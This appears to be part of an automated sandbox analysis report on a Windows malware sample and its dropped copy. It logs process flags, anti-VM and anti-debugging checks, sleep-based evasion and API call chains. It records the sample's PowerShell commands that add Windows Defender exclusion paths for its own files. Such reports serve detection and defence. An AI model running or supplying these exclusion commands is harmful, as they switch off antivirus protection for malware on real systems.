                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: LdSbZG1iH6.exe PID: 7276, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: DGlxtFUfY.exe PID: 7840, type: MEMORYSTR
                      Delayed program exit found
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0040F7E2 Sleep,ExitProcess,8_2_0040F7E2
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeMemory allocated: F80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeMemory allocated: 2DD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeMemory allocated: 2C70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeMemory allocated: 92B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeMemory allocated: A2B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeMemory allocated: A4C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeMemory allocated: B4C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeMemory allocated: D00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeMemory allocated: 2750000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeMemory allocated: D20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeMemory allocated: 8720000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeMemory allocated: 8280000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeMemory allocated: 9720000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeMemory allocated: A720000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,16_2_0040DD85
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,8_2_0041A7D9
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7101Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 834Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6992Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 388Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeWindow / User API: threadDelayed 3705
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeWindow / User API: threadDelayed 5822
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeWindow / User API: foregroundWindowGot 1710
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeAPI coverage: 9.4 %
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe TID: 7296Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7616Thread sleep count: 7101 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7620Thread sleep count: 834 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7756Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7716Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7732Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe TID: 7948Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe TID: 8104Thread sleep time: -41000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe TID: 8108Thread sleep time: -11115000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe TID: 8108Thread sleep time: -17466000s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_0040928E
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_0041C322
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_0040C388
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_004096A0
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_00408847
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_00407877 FindFirstFileW,FindNextFileW,8_2_00407877
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_0040BB6B
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_00419B86
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_0040BD72
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 14_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,14_2_100010F1
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_0040AE51 FindFirstFileW,FindNextFileW,16_2_0040AE51
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407EF8
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_00407CD2
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_00418981 memset,GetSystemInfo,16_2_00418981
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.000000000175C000.00000004.00000020.00020000.00000000.sdmp, DGlxtFUfY.exe, 0000000E.00000002.2908866970.00000000016D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: bhvD3AB.tmp.16.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1995908701.00000000078A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}J-4W
                      Source: bhvD3AB.tmp.16.drBinary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00434A8A
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,16_2_0040DD85
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_0041CBE1
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_00443355 mov eax, dword ptr fs:[00000030h]8_2_00443355
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 14_2_10004AB4 mov eax, dword ptr fs:[00000030h]14_2_10004AB4
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_004120B2 GetProcessHeap,HeapFree,8_2_004120B2
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0043503C
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00434A8A
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0043BB71
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_00434BD8 SetUnhandledExceptionFilter,8_2_00434BD8
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 14_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_100060E2
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 14_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_10002639
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 14_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_10002B1C
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe"
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DGlxtFUfY.exe"
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DGlxtFUfY.exe"Jump to behavior
                      Contains functionality to inject code into remote processes
